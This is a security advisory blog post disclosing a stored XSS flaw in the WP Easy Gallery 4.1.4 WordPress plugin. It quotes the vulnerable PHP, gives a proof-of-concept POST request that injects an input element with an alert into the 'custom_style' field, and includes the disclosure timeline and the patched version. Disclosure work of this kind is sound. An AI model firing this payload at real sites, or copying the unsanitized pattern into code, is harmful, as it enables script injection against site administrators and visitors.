WP Easy Gallery v4.1.4 Stored XSS Vulnerability

## FULL DISCLOSURE

#Product : WP Easy Gallery
#Exploit Author : Rahul Pratap Singh
#Version : 4.1.4
#Home page Link : https://wordpress.org/plugins/wp-easy-gallery
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 26/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“custom_style” parameter is not sanitized that leads to Stored XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: wpeg-settings.php

Found at line:12

$temp_defaults[‘custom_style’] = isset($_POST[‘custom_style’]) ? $_POST[‘custom_style’] : ”;

Found at line:103

<td><textarea name=”custom_style” id=”custom_style” rows=”4″ cols=”40″><?php _e($default_options[‘custom_style’]); ?></textarea></td>

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin.php?page=wpeg-settings

wpeg_settings=3b59e6c6ef&_wp_http_referer=abc&display_mode=abc&num_columns =abc&show_gallery_name=abc&gallery_name_alignment=abc&use_default_style= abc&drop_shadow=abc&custom_style=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!–&defaultSettings =xss&Submit=Save

—————————————-
POC:
—————————————-
Easy Gallery Settingsxsspoc

Fix:
Update to 4.1.5

Disclosure Timeline:
reported to wordpress                                    : 18/1/2016
wordpress response (plugin taken down) : 19/1/2016
vendor deployed a patch                                : 26/1/2016

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/wp-easy-gallery/changelog/

 

Advertisements

One thought on “WP Easy Gallery v4.1.4 Stored XSS Vulnerability

  1. Thanks for the info! Someone or machine tried to explore my website. I don’t have the plugin, but my server logged the 404 (wp-content/plugins/wp-easy-gallery-pro/admin/php.php) and emailed me of the issue. I did a google search and found your post. Now I understand what XSS Vulnerability is and knowledge that my site is safe. 🙂

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s